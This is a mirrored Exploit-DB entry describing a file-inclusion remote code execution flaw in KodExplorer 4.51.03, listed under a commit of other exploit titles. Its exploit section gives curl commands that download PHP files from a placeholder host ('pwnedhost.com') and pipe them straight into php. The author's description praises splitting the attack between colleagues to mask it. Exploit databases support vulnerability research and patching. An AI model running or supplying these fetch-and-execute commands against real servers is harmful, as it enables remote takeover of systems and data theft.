bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51419.txt
Exploit-DB 8945b320b5 DB: 2023-05-06 
20 changes to exploits/shellcodes/ghdb

Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution

Cmaps v8.0 - SQL injection

EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal)

File Thingie 2.5.7 - Remote Code Execution (RCE)

Intern Record System v1.0 - SQL Injection (Unauthenticated)
Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path
Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
Jedox 2022.4.2 - Code Execution via RPC Interfaces
Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks
Jedox 2022.4.2 - Remote Code Execution via Directory Traversal

KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)

Online Pizza Ordering System v1.0 - Unauthenticated File Upload

pluck v4.7.18 - Stored Cross-Site Scripting (XSS)

Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)
Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)
Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)

Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
2023-05-06 00:16:26 +00:00

48 lines
No EOL
1.7 KiB
Text
Raw Blame History

## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.30.2023
## Vendor: https://kodcloud.com/
## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03
## Reference: https://portswigger.net/web-security/file-upload
## Description:
By using this vulnerability remotely, the malicious pwned_admin can
list and manipulate all files inside the server. This is an absolutely
DANGEROUS and STUPID decision from the application owner! In this
scenario, the attacker prepares the machine for exploitation and sends
a link for remote execution by using the CURL protocol to his
supporter - another attacker. Then and he waits for execution from his
colleague, to mask his action or even more worst than ever. What a
nice hack is this! :)
STATUS: CRITICAL Vulnerability
[+]Exploit:
```CURL
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php
| php
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php
| php
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03)
## Proof and Exploit:
[href](https://streamable.com/98npd0)
## Time spend:
01:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Reference in a new issue View git blame Copy permalink